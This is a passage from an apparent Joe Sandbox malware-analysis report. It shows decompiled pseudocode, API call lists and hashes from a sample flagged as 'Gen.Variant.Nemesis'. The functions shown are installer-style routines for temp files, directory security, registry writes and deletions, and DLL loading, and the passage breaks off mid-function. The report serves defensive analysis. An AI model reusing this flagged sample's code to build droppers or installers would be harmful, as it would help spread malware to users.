0x004026e3
0x004026ef
0x00402759
0x00402759
0x004026f1
0x004026f1
0x004026f4
0x004026f6
0x004026f6
0x004026f6
0x004026f9
0x004026fe
0x00402701
0x00000000
0x00000000
0x00402703
0x00402706
0x0040270e
0x0040271a
0x00402728
0x00000000
0x0040272a
0x00000000
0x0040272a
0x00000000
0x00402728
0x004026f6
0x0040275c
0x0040275f
0x00000000
0x00402761
0x00402766
0x004027a7
0x004027c9
0x004027d0
0x004027b5
0x004027b5
0x004027b8
0x004027bb
0x004027be
0x004027be
0x00000000
0x0040276f
0x0040276f
0x00402772
0x00402775
0x0040277b
0x0040277f
0x00402782
0x00000000
0x00000000
0x00000000
0x00000000
0x00402782
0x00402766
0x0040275f
0x004026d7
0x004026c3
0x004026b8
0x00000000
0x00402784
0x00402784
0x00402787
0x00402790
0x00000000
0x00402687
0x00402672
0x00402ac8
0x00402ace

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724

Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E6B

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0

Strings

9, xrefs: 00402693

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58

Uniqueness

Uniqueness Score: -1.00%

Function 004065EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004065EC(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x00406603
0x0040660c
0x0040660e
0x0040660e
0x00406612
0x00406625
0x0040661f
0x0040661f
0x0040661f
0x0040663e
0x00406652
0x00406659

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
wsprintfW.USER32 ref: 0040663E
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652

Strings

\, xrefs: 00406614
%s%S.dll, xrefs: 00406638
UXTHEME, xrefs: 004065F5

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 71749ee66451d02820e1787a81c679d49f65c12e6a5790e59d0bd58148e6f3af
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: 64F021705001196BCF10AB64DD0DFAB3B5CA700304F10487AA546F11D1EBBDDA65CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004057B5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004057B5(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f0;
				_v36.Group = 0x4083f0;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e0;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x004057c0
0x004057c4
0x004057c7
0x004057cd
0x004057d1
0x004057d5
0x004057dd
0x004057e4
0x004057ea
0x004057f1
0x004057f8
0x00405800
0x00405802
0x00000000
0x00405802
0x0040580c
0x00405813
0x00405829
0x00000000
0x00000000
0x00000000
0x0040582b
0x0040582f

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
GetLastError.KERNEL32 ref: 0040580C
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
GetLastError.KERNEL32 ref: 0040582B

Strings

C:\Users\user\Desktop, xrefs: 004057B5

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-3370423016
Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction ID: 81d47e77b106c5c69b6f53bab6ade4ced08fad65239eb4e1eedbceb886e7a33c
Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction Fuzzy Hash: 8C01E5B2C00619DADF009FA1D9487EFBFB8EB14354F00803AD945B6281E7789618CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405DA3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405DA3(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a55c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00405da9
0x00405daf
0x00405db0
0x00405db0
0x00405db5
0x00405db6
0x00405db9
0x00405dbe
0x00405dc1
0x00405dcb
0x00405dd8
0x00405ddc
0x00405de4
0x00000000
0x00000000
0x00405de8
0x00000000
0x00405dea
0x00405dea
0x00405dea
0x00405ded
0x00405df0
0x00405df0
0x00405df3
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405DC1
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75523420,004035BF), ref: 00405DDC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DA8, 00405DAC
"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe", xrefs: 00405DA3
nsa, xrefs: 00405DB0

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2392129332
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: 0c0ec814c80ab85915f41b1413265c2d813ce01cabb3ac5407dd3af97de42ecd
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: 99F03076600304FFEB009F69DD09E9BB7A9EF95710F11803BE900E7250E6B199549B64

Uniqueness

Uniqueness Score: -1.00%

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push(1); // executed
				_t34 = E10001B18(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A4(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A4(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A4(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E10002467(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B57(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E1000289C(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002640(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x10001759
0x10001759
0x10001759
0x10001763
0x1000176b
0x10001778
0x10001786
0x10001789
0x1000178b
0x10001790
0x10001795
0x100018a8
0x100018a8
0x1000179b
0x1000179f
0x100017a2
0x100017a7
0x100017a8
0x100017a9
0x100017af
0x100017b5
0x100017e5
0x100017ec
0x10001810
0x1000184f
0x10001812
0x10001812
0x10001813
0x10001816
0x1000181c
0x10001820
0x10001823
0x10001828
0x10001828
0x1000182f
0x10001835
0x1000183b
0x10001847
0x10001848
0x1000184b
0x100017ee
0x100017ef
0x10001804
0x10001804
0x10001859
0x1000185c
0x10001869
0x10001870
0x10001878
0x1000187b
0x1000187b
0x10001878
0x10001888
0x10001890
0x10001895
0x10001888
0x1000189d
0x00000000
0x1000189f
0x00000000
0x100018a0
0x1000189d
0x100017b9
0x100017bc
0x100017da
0x00000000
0x00000000
0x100017dd
0x100017e2
0x100017e2
0x100017e4
0x00000000
0x100017e4
0x100017be
0x100017bf
0x100017c7
0x100017c8
0x00000000
0x100017c8
0x100017c1
0x100017c2
0x100017d0
0x00000000
0x100017d0
0x100017c5
0x00000000
0x00000000
0x00000000
0x100017c5

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNEL32(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8

Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761

Uniqueness

Uniqueness Score: -1.00%

Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004023DE(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x18));
				_t34 = __eax;
				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
				 *(_t39 - 0x3c) = E00402C37(2);
				_t20 = E00402C37(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402CC7(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402C37(0x23);
						_t24 = lstrlenW(0x40b5d0) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5d0 = E00402C15(3);
						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004030FA( *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5d0, 0x1800);
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5d0, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
				return 0;
			}

0x004023de
0x004023de
0x004023de
0x004023e1
0x004023e8
0x004023f2
0x004023f5
0x004023fe
0x00402405
0x0040240c
0x0040240f
0x00402415
0x0040241f
0x00402423
0x0040242e
0x0040242e
0x00402435
0x0040243f
0x00402445
0x00402448
0x00402448
0x0040244c
0x00402458
0x00402458
0x00402469
0x00402471
0x00402473
0x00402473
0x00402476
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbA35F.tmp,00000023,00000011,00000002), ref: 00402429
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsbA35F.tmp,00000000,00000011,00000002), ref: 00402469
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsbA35F.tmp,00000000,00000011,00000002), ref: 00402551

Strings

C:\Users\user\AppData\Local\Temp\nsbA35F.tmp, xrefs: 0040241A, 0040243F, 00402453, 0040245E

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp
API String ID: 2655323295-4159560630
Opcode ID: d314daa77b1a5bddc68282b153224c2aabf702024f7a5803a7dd81a3f3e5214a
Instruction ID: 6bb9d856f7880fc58a9027dca602f60b1bf716c37025aa19f03bdcb786be9778
Opcode Fuzzy Hash: d314daa77b1a5bddc68282b153224c2aabf702024f7a5803a7dd81a3f3e5214a
Instruction Fuzzy Hash: 33118171E00108AEEB10AFA5DE49EAEBAB8EB54354F11843AF504F71D1DBB84D419B58

Uniqueness

Uniqueness Score: -1.00%

Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402D2A(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				short _v532;
				void* _t19;
				signed int _t26;
				intOrPtr* _t28;
				signed int _t33;
				signed int _t34;
				signed int _t35;

				_t34 = _a12;
				_t35 = _t34 & 0x00000300;
				_t33 = _t34 & 0x00000001;
				_t19 = E004060EF(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8); // executed
				if(_t19 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						_t26 = E00402D2A(__eflags, _v8,  &_v532, _a12);
						__eflags = _t26;
						if(_t26 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t28 = E0040665C(3);
					if(_t28 == 0) {
						return RegDeleteKeyW(_a4, _a8);
					}
					return  *_t28(_a4, _a8, _t35, 0);
				}
				return _t19;
			}

0x00402d35
0x00402d3e
0x00402d47
0x00402d53
0x00402d5a
0x00402d7e
0x00402d64
0x00402d66
0x00402db9
0x00000000
0x00402dc1
0x00402d75
0x00402d7a
0x00402d7c
0x00000000
0x00000000
0x00402d7c
0x00402d98
0x00402da0
0x00402da7
0x00000000
0x00402dca
0x00000000
0x00402db2
0x00402dd4

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
RegCloseKey.ADVAPI32(?), ref: 00402D98
RegCloseKey.ADVAPI32(?), ref: 00402DB9

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 5909a01bd3e8ace8153d47d3a2ea75d089a0f360c4c69a6458f7b2daf3ea3ca1
Instruction ID: 79d7ed05643b621c8e133add132d673d265f3a1e436d48668917152172a1be90
Opcode Fuzzy Hash: 5909a01bd3e8ace8153d47d3a2ea75d089a0f360c4c69a6458f7b2daf3ea3ca1
Instruction Fuzzy Hash: AD116A32540509FBDF129F90CE09BEE7B69EF58340F110036B905B50E0E7B5DE21AB68

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402C37(0xfffffff0);
				_t17 = E00405BFE(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405B80(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405832( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E0040584F(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E004057B5( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
